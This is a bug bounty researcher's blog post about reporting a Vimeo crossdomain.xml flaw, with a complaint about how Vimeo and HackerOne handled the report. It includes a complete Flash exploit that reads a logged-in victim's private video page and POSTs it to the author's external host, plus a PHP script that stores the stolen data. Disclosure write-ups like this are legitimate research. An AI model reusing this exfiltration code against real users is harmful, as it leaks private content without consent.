Friday, November 11, 2016

Leak Private Videos [Vimeo Bug Bounty]




Hi , guys I hope you are doing well .

Today I will talk about one of my worst experiences in bug bounty programs with Vimeo security team .

First for who don't know Vimeo  :

Vimeo (/ˈvɪmioʊ/[3]) is a video-sharing website in which users can upload, share and view videos.[4] It was the first video sharing site to support high-definition video (started in October 2007).[5] Vimeo was founded in November 2004 by Jake Lodwick and Zach Klein. [wiki]

They have started there BB program on hacker one since 2 years ago .

I am not so active these days in the BB but I saw they paid $600  for Private videos disclosure and CSRF on Vimeo leading toprivate videos go public I told myself let's give a try . So the target wasn't about finding XSS or harmless CSRF it was about find a way to leak the private videos since they don't pay well for XSS or other bugs you will get duplicated or mini bounty that you waste a lot of time on .

So I started by reading old reports that related to this purpose . Almost every report was about crossdomain.xml file misconfiguration I focused on this file around the Vimeo sites .

In their rules there are a point about the corssdomain.xml that should be exploitable not just a novel :


  • Reports of insecure crossdomain.xml configuration (again, unless you have a working proof of concept -- and not just a report from a scanner) 

So I stared looking for this file around the sites and try to find a way to exploit it . I found one here 




It is allowing any domain to send requests to this host so the first step in the exploit is okay . But ! we can't say it is a security issue since the player should works in other hosts   


So let's see what is can be leaked like CSRF-token , username , email ...etc 

After some test I found out that player.vimeo.com check the user cookie to know if he is logged in or not . After that it shows him the private video if he have a permission to show it . 

Now I am using 2 browsers Chrome for unauthenticated user and Firefox for user (user36551307)

I uploaded video and set the privacy to only me . here it is https://player.vimeo.com/video/182118182 

If we open it using FF we will get this :





If we open it using Chrome 





So the source code of the page depends on the user authentication and we can leak in both ways !!! 

Now we need to write a flash file to send request to this URL and leak the source code of the page and see if we get the source can we play the video . and I copy the source code of the html page and save it on my PC something like test.html and it works fine ! 


I called leak.swf


We need to modify the flash file in readFrom:String and sendTo:String


 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
package {
 import flash.display.Sprite;
 import flash.events.*;
 import flash.net.URLRequestMethod;
 import flash.net.URLRequest;
 import flash.net.URLLoader;

 public class XDomainXploit extends Sprite {
  public function XDomainXploit() {
   //URL of the  private video for the authenticated user  
   var readFrom:String = "https://player.vimeo.com/video/182118182";
   var readRequest:URLRequest = new URLRequest(readFrom);
   var getLoader:URLLoader = new URLLoader();
   getLoader.addEventListener(Event.COMPLETE, eventHandler);
   try {
    getLoader.load(readRequest);
   } catch (error:Error) {
    trace("Error loading URL: " + error);
   }
  }

  private function eventHandler(event:Event):void {
   //URL to the attacker origin 
   var sendTo:String = "http://xxe-me.esy.es/video.php"
   var sendRequest:URLRequest = new URLRequest(sendTo);
   sendRequest.method = URLRequestMethod.POST;
   sendRequest.data = event.target.data;
   var sendLoader:URLLoader = new URLLoader();
   try {
    sendLoader.load(sendRequest);
   } catch (error:Error) {
    trace("Error loading URL: " + error);
   }
  }
 }



I modified it to the video URL and my host URL . The swf file will send the source code of the the Vimeo player to video.php which will save the source of this page as new html page .


The video.php source code :



 1
 2
 3
 4
 5
 6
 7
 8
 9
10
<?php
$data = file_get_contents("php://input");
$page_content = file_put_contents('private_video.html', $data, FILE_APPEND | LOCK_EX);
if($page_content === false) {
 die('Didn't work ! ');
}
else { 
 echo "$page_content exploited !";
}
?>


When the file get the source code of the page from the leak.swf php code will create a html page called private_video.html with the source code that it got before .


So I made an exploit with full PoC here is the PoC video :







So everything works fine . I wrote a good report with PoC , codes ,steps  and technical details  .


I got bot response said this is not an issue please provide working PoC ! I already did but I send the video one more time .

after 2 days the team closed the report as " Informative "  and with this replay

Thanks for your report. We are aware of this. This is how we allow custom flash players to work.

I was puzzled why they closed this . It is %100 a security issue ! I replayed to them and requested to disclose this report publicly .

I waited for days and requested mediation from HackerOne Support . after 30 days the H1 support told me Vimeo team pushed the public discourse 2 days and should be published then . Fine I will wait for to see the reaction of H1 community . After waiting for 2 days nothing happened  !  I waited for 10 days maybe and it is not published yet ! I contacted H1 support again . The last message I got this one :




So Vimoe team has never replayed me in the report and they didn't fix it or contact me for months and they want a 60 days after I requested the PD above all of this this report were closed as " Informative " .

And H1 team has nothing to do ! So I wrote this post for show we aren't in the BB heaven . 


BTW this is not the first time for Vimeo team , here is another report without bounty or a respectful replay https://hackerone.com/reports/49663


If you have an opinion on this you can comment it here or on my twitter account @Abdulahhusam



That is all .

Thanks for read .